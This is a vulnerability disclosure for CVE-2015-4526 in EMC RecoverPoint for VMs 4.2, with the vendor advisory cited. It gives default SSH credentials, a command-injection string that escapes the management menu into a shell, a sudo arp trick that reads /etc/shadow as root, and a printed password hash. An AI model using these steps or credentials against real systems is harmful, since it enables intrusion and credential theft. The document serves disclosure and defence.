Vulnerability Description
RecoverPoint’s virtual appliance can be accessible via SSH with the default credentials of boxmgmt:boxmgmt; during testing, no password change option was found. Using these credentials, it’s possible to escape the management interface via command injection to drop into a shell and further take advantage of sudo privileged operations to read arbitrary files as root. It also may also be possible to execute arbitrary os commands as root, but this was not confirmed.
Analysis / Reproduction
Bug #1: Escape-to-Shell
$ ssh boxmgmt@emc-vrpa Password: [boxmgmt] Initializing Installation Manager... done Installation Manager - RecoverPoint Version 4.2(mercury.92) Cluster vrpa RPA 1 ** Main Menu ** [1] Installation [2] Setup <strong>[3] Diagnostics</strong> […] vrpa RPA 1: 3 ** Diagnostics ** […] <strong>[5] Run internal command</strong> [M] Main Menu [B] Back [Q] Quit vrpa RPA 1: 5 […] Enter internal command: ssh `bash>&2` boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ uname –a;id Linux RecoverPoint-0x7c037c1d8ca0d2bd-RPA1 3.0.56-k3 #11 SMP Tue May 21 13:50:27 IDT 2013 x86_64 GNU/Linux uid=562(boxmgmt) gid=562(boxmgmt) groups=562(boxmgmt)
Bug #2: Arbitrary File Read with Root Privileges
/bin/run_boxmgmt (the management interface) calls the Java core UI which is written located on the box here:
/home/kos/kashya/archive/classes/com.kashya.recoverpoint.installation.client.jar
After extracting the JAR and decompiling the RunInternalCmdUIStep.class file, we can see there are several commands which will run with root privileges via sudo:
public class RunInternalCmdUIStep
[…]
allowedCmds.put("arp", Boolean.TRUE);
allowedCmds.put("arping", Boolean.TRUE);
allowedCmds.put("date", Boolean.FALSE);
allowedCmds.put("ethtool", Boolean.TRUE);
allowedCmds.put("kps.pl", Boolean.TRUE);
[...]
try
{
PrintStream ps = new PrintStream("/tmp/internal_cmd");
if (((Boolean)allowedCmds.get(cmdName)).booleanValue()) {
ps.print("sudo ");
}
ps.print(internalCmd);
ps.close();
}
run_boxmgmt then reads the contents of /tmp/internal_cmd and executes command for the caller.
For example, we see boxmgmt can execute the ‘arp’ binary with sudo. arp can be given a file to read and using the verbose flag, will spit out its contents upon error. So, if we wanted to read any file as root, we could leverage arp like this:
boxmgmt@RecoverPoint-0x7c037c1d8ca0d2bd-RPA1:~$ sudo arp -v -f /etc/shadow >> root:$1$Hy6MAnOy$tlHmRGo2lO4jzlcM42Uto0:13933:0:99999:7::: arp: format error on line 1 of etherfile /etc/shadow ! >> daemon:*:16040:0:99999:7::: [...]
We can use this bug to gain further insight by reading the /etc/sudoers file:
root ALL = (ALL) ALL […] boxmgmt ALL = NOPASSWD: /home/kos/kbox/src/installation/Installation/scripts/run_collect_kbox_info.sh boxmgmt ALL = NOPASSWD: /usr/bin/ssh boxmgmt ALL = NOPASSWD: /usr/sbin/ethtool boxmgmt ALL = NOPASSWD: /usr/sbin/arp boxmgmt ALL = NOPASSWD: /usr/bin/arping boxmgmt ALL = NOPASSWD: /usr/bin/kps.pl
If any of these other binaries or scripts could be further leveraged into executing arbitrary commands (instead of just reading files), dropping into a root shell would be trivial.
Vulnerable Version
EMC RecoverPoint for VMs version 4.2
CVE
A single CVE has been assigned for this vulnerability CVE-2015-4526.
Vendor Response
The vendor has issued an advisory, http://seclists.org/bugtraq/2015/Jul/att-59/ESA-2015-115.txt
